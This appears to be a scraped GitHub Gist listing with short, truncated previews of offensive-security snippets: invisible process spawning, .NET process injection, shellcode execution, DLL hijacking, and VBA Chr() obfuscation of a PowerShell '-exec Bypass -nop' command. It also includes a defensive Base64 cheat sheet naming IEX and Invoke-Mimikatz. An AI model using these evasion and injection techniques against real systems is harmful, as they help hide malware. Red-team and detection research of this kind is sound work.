@Mr-Un1k0d3r
Mr-Un1k0d3r / run.c
Created Aug 11, 2021
spawn an invisible process
// To compile: gcc64.exe run.c -o run.exe
// To run: run.exe cmd.exe "/c whoami"
#include <Windows.h>
#include <stdio.h>
int main(int argc, char **argv) {
CHAR cDesktop[] = "hiddendesktop";
HDESK hDesk = CreateDesktop(cDesktop, NULL, NULL, DF_ALLOWOTHERACCOUNTHOOK, GENERIC_ALL, NULL);
system32_exports.txt (truncated preview):
[*] - C:\Windows\System32\1028\VsGraphicsResources.dll
[?] 64-bit Image!
[>] Time Stamp: 12/31/1969 19:00:00
[>] Function Count:
[>] Named Functions:
[>] Ordinal Base:
[>] Function Array RVA: 0x
@rvrsh3ll
rvrsh3ll / DInjectQueuerAPC.cs
Created Nov 20, 2020 — forked from jfmaes/DInjectQueuerAPC.cs
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
namespace DinjectorWithQUserAPC
{
public class Program
@ropnop
ropnop / go-sharp-loader.go
Created Aug 5, 2020
Example Go file embedding multiple .NET executables
package main
/*
Example Go program with multiple .NET Binaries embedded
This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with:
$ go get -u github.com/gobuffalo/packr/packr
Place all your EXEs in a "binaries" folder
@TheWover
TheWover / EtwpTest.cs
Created May 6, 2020
Demonstrates using ntdll.dll!EtwpCreateThreadEtw for local shellcode execution.
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace EtwpTest
{
class Program
{
static void Main(string[] args)
{
@TheWover
TheWover / Find-Assemblies.ps1
Last active Aug 2, 2021
Search a directory for .NET Assemblies, including Mixed Assemblies. Options for searching recursively, including DLLs in scope, and including all files in scope.
Param([parameter(Mandatory=$true,
HelpMessage="Directory to search for .NET Assemblies in.")]
$Directory,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to search recursively.")]
[switch]$Recurse = $false,
[parameter(Mandatory=$false,
HelpMessage="Whether or not to include DLLs in the search.")]
[switch]$DLLs = $false,
[parameter(Mandatory=$false,
@monoxgas
monoxgas / main.cpp
Created Feb 12, 2020
Adaptive DLL Hijacking - Patching LoadLibrary Return
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
BOOL PatchTheRet(HMODULE realModule) {
// Get primary module info
@monoxgas
monoxgas / main.cpp
Created Feb 12, 2020
Adaptive DLL Hijacking - Stability Hooking
#include <Windows.h>
#include <intrin.h>
#include <string>
#include <TlHelp32.h>
#include <psapi.h>
DWORD WINAPI Thread(LPVOID lpParam) {
// Insert evil stuff
ExitProcess(0);
@khr0x40sh
khr0x40sh / Get-VBACHRObfuscatedString.ps1
Created Nov 19, 2019
Takes a string and applies CHR(ascii int) & for each character in string
Param([string]$string = "C:\windows\syswow64\windowspowershell\v1.0\powershell.exe -exec Bypass -nop ping 127.0.0.1"
);
$result = ""
$strA = $string.ToCharArray()
for($i = 0; $i -lt $strA.Length; $i++)
{
$x = [byte]$strA[$i]
$result += "Chr (" + $x.ToString() + ") & "
}
@Neo23x0
Neo23x0 / Base64_CheatSheet.md
Last active Oct 7, 2021
Learning Aid - Top Base64 Encodings Table
| Base64 Code | Mnemonic Aid | Decoded* | Description |
|---|---|---|---|
| JAB | 🗣 Jabber | $. | Variable declaration (UTF-16) |
| TVq | 📺 Television | MZ | MZ header |
| SUVY | 🚙 SUV | IEX | PowerShell Invoke Expression |
| SQBFAF | 🐣 Squab favorite | I.E. | PowerShell Invoke Expression (UTF-16) |
| SQBuAH | 🐣 Squab uahhh | I.n. | PowerShell Invoke string (UTF-16), e.g. Invoke-Mimikatz |
| PAA | 💪 "Pah!" | <. | Often used by Emotet (UTF-16) |